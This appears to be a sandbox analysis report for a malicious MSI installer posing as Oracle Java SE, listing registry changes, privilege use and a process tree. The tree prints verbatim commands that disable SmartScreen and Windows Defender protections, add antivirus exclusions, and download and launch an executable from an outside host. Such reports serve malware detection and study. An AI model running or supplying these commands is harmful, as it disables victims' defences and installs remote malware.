  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\PackageName = "0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi"  msiexec.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff  explorer.exe
  Set value (str)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"  explorer.exe
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
  pid   Process
  6032  explorer.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  pid   Process
  4992  msiexec.exe
  4992  msiexec.exe
  4732  powershell.exe
  3132  powershell.exe
  3380  powershell.exe
  4008  powershell.exe
  3132  powershell.exe
  4008  powershell.exe
  3380  powershell.exe
  4732  powershell.exe
  4832  powershell.exe
  4832  powershell.exe
  4356  powershell.exe
  4356  powershell.exe
  4364  powershell.exe
  4364  powershell.exe
  4756  powershell.exe
  4756  powershell.exe
  2812  powershell.exe
  2812  powershell.exe
  2840  powershell.exe
  2840  powershell.exe
  4488  powershell.exe
  4488  powershell.exe
  1644  powershell.exe
  1644  powershell.exe
  4472  powershell.exe
  4472  powershell.exe
  892   powershell.exe
  892   powershell.exe
  4328  powershell.exe
  4328  powershell.exe
  3200  powershell.exe
  3200  powershell.exe
  1232  powershell.exe
  1232  powershell.exe
  4460  powershell.exe
  4460  powershell.exe
  3232  powershell.exe
  3232  powershell.exe
  4812  powershell.exe
  4812  powershell.exe
  4396  powershell.exe
  4396  powershell.exe
  3000  powershell.exe
  3000  powershell.exe
  4356  powershell.exe
  4356  powershell.exe
  4364  powershell.exe
  4364  powershell.exe
  4488  powershell.exe
  4832  powershell.exe
  4832  powershell.exe
  1644  powershell.exe
  2812  powershell.exe
  4472  powershell.exe
  4756  powershell.exe
  4756  powershell.exe
  892   powershell.exe
  4328  powershell.exe
  4812  powershell.exe
  2840  powershell.exe
  4460  powershell.exe
  3232  powershell.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description                           pid   Process
  Token: SeShutdownPrivilege            844   msiexec.exe
  Token: SeIncreaseQuotaPrivilege       844   msiexec.exe
  Token: SeSecurityPrivilege            4992  msiexec.exe
  Token: SeCreateTokenPrivilege         844   msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege  844   msiexec.exe
  Token: SeLockMemoryPrivilege          844   msiexec.exe
  Token: SeIncreaseQuotaPrivilege       844   msiexec.exe
  Token: SeMachineAccountPrivilege      844   msiexec.exe
  Token: SeTcbPrivilege                 844   msiexec.exe
  Token: SeSecurityPrivilege            844   msiexec.exe
  Token: SeTakeOwnershipPrivilege       844   msiexec.exe
  Token: SeLoadDriverPrivilege          844   msiexec.exe
  Token: SeSystemProfilePrivilege       844   msiexec.exe
  Token: SeSystemtimePrivilege          844   msiexec.exe
  Token: SeProfSingleProcessPrivilege   844   msiexec.exe
  Token: SeIncBasePriorityPrivilege     844   msiexec.exe
  Token: SeCreatePagefilePrivilege      844   msiexec.exe
  Token: SeCreatePermanentPrivilege     844   msiexec.exe
  Token: SeBackupPrivilege              844   msiexec.exe
  Token: SeRestorePrivilege             844   msiexec.exe
  Token: SeShutdownPrivilege            844   msiexec.exe
  Token: SeDebugPrivilege               844   msiexec.exe
  Token: SeAuditPrivilege               844   msiexec.exe
  Token: SeSystemEnvironmentPrivilege   844   msiexec.exe
  Token: SeChangeNotifyPrivilege        844   msiexec.exe
  Token: SeRemoteShutdownPrivilege      844   msiexec.exe
  Token: SeUndockPrivilege              844   msiexec.exe
  Token: SeSyncAgentPrivilege           844   msiexec.exe
  Token: SeEnableDelegationPrivilege    844   msiexec.exe
  Token: SeManageVolumePrivilege        844   msiexec.exe
  Token: SeImpersonatePrivilege         844   msiexec.exe
  Token: SeCreateGlobalPrivilege        844   msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeShutdownPrivilege            2500  MsiExec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4992  msiexec.exe
  Token: SeRestorePrivilege             4992  msiexec.exe
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msiexec.exe
pid Process
844 msiexec.exe
844 msiexec.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
explorer.exe
pid Process
6032 explorer.exe
6032 explorer.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exe MsiExec.exe cmd.exe cmd.exe
description pid Process procid_target
PID 4992 wrote to memory of 692 4992 msiexec.exe 84
PID 4992 wrote to memory of 692 4992 msiexec.exe 84
PID 4992 wrote to memory of 692 4992 msiexec.exe 84
PID 4992 wrote to memory of 2500 4992 msiexec.exe 85
PID 4992 wrote to memory of 2500 4992 msiexec.exe 85
PID 4992 wrote to memory of 2500 4992 msiexec.exe 85
PID 2500 wrote to memory of 4912 2500 MsiExec.exe 86
PID 2500 wrote to memory of 4912 2500 MsiExec.exe 86
PID 2500 wrote to memory of 4912 2500 MsiExec.exe 86
PID 4912 wrote to memory of 1992 4912 cmd.exe 88
PID 4912 wrote to memory of 1992 4912 cmd.exe 88
PID 4912 wrote to memory of 1992 4912 cmd.exe 88
PID 4912 wrote to memory of 532 4912 cmd.exe 89
PID 4912 wrote to memory of 532 4912 cmd.exe 89
PID 4912 wrote to memory of 532 4912 cmd.exe 89
PID 4912 wrote to memory of 2140 4912 cmd.exe 90
PID 4912 wrote to memory of 2140 4912 cmd.exe 90
PID 4912 wrote to memory of 2140 4912 cmd.exe 90
PID 4912 wrote to memory of 2592 4912 cmd.exe 92
PID 4912 wrote to memory of 2592 4912 cmd.exe 92
PID 4912 wrote to memory of 2592 4912 cmd.exe 92
PID 4912 wrote to memory of 3132 4912 cmd.exe 93
PID 4912 wrote to memory of 3132 4912 cmd.exe 93
PID 4912 wrote to memory of 3132 4912 cmd.exe 93
PID 4912 wrote to memory of 3380 4912 cmd.exe 94
PID 4912 wrote to memory of 3380 4912 cmd.exe 94
PID 4912 wrote to memory of 3380 4912 cmd.exe 94
PID 4912 wrote to memory of 4732 4912 cmd.exe 95
PID 4912 wrote to memory of 4732 4912 cmd.exe 95
PID 4912 wrote to memory of 4732 4912 cmd.exe 95
PID 4912 wrote to memory of 1988 4912 cmd.exe 96
PID 4912 wrote to memory of 1988 4912 cmd.exe 96
PID 4912 wrote to memory of 1988 4912 cmd.exe 96
PID 1988 wrote to memory of 4008 1988 cmd.exe 97
PID 1988 wrote to memory of 4008 1988 cmd.exe 97
PID 1988 wrote to memory of 4008 1988 cmd.exe 97
PID 4912 wrote to memory of 4756 4912 cmd.exe 98
PID 4912 wrote to memory of 4756 4912 cmd.exe 98
PID 4912 wrote to memory of 4756 4912 cmd.exe 98
PID 4912 wrote to memory of 4832 4912 cmd.exe 99
PID 4912 wrote to memory of 4832 4912 cmd.exe 99
PID 4912 wrote to memory of 4832 4912 cmd.exe 99
PID 4912 wrote to memory of 4356 4912 cmd.exe 100
PID 4912 wrote to memory of 4356 4912 cmd.exe 100
PID 4912 wrote to memory of 4356 4912 cmd.exe 100
PID 4912 wrote to memory of 4364 4912 cmd.exe 101
PID 4912 wrote to memory of 4364 4912 cmd.exe 101
PID 4912 wrote to memory of 4364 4912 cmd.exe 101
PID 4912 wrote to memory of 2812 4912 cmd.exe 102
PID 4912 wrote to memory of 2812 4912 cmd.exe 102
PID 4912 wrote to memory of 2812 4912 cmd.exe 102
PID 4912 wrote to memory of 4328 4912 cmd.exe 103
PID 4912 wrote to memory of 4328 4912 cmd.exe 103
PID 4912 wrote to memory of 4328 4912 cmd.exe 103
PID 4912 wrote to memory of 4488 4912 cmd.exe 104
PID 4912 wrote to memory of 4488 4912 cmd.exe 104
PID 4912 wrote to memory of 4488 4912 cmd.exe 104
PID 4912 wrote to memory of 2840 4912 cmd.exe 105
PID 4912 wrote to memory of 2840 4912 cmd.exe 105
PID 4912 wrote to memory of 2840 4912 cmd.exe 105
PID 4912 wrote to memory of 892 4912 cmd.exe 106
PID 4912 wrote to memory of 892 4912 cmd.exe 106
PID 4912 wrote to memory of 892 4912 cmd.exe 106
PID 4912 wrote to memory of 1644 4912 cmd.exe 107
Processes
(process tree; indentation shows parent/child depth)

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:844

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992

  C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C27E79C608EB6A995EF32E0AB84ECDA0
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:692

  C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0C88C33908E44AEFA38856570E312642 E Global\MSI0000
  - Drops file in Windows directory
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2500

    C:\Windows\syswow64\cmd.exe
    "cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4912

      C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\System32\smartscreen.exe" /a
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      PID:1992

      C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\System32\smartscreen.exe" /reset
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      PID:532

      C:\Windows\SysWOW64\taskkill.exe
      taskkill /im smartscreen.exe /f
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      PID:2140

      C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      PID:2592

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:3132

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:3380

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4732

      C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:1988

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -MAPSReporting 0"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        PID:4008

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -PUAProtection disable"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4756

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4832

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4356

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4364

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:2812

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4328

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4488

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:2840

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:892

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:1644

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4472

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:3200

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:3232

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4812

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4396

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:3000

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4460

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest https://atclouroettfbquhfimp.com/start.EXE -OutFile start.EXE
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:1232

      C:\Windows\SysWOW64\explorer.exe
      explorer.exe "start.EXE"
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      PID:5912

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:6032
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (2)
  - Windows File and Directory Permissions Modification (1)
- Modify Registry (1)
- System Binary Proxy Execution (1)
  - Msiexec (1)
Downloads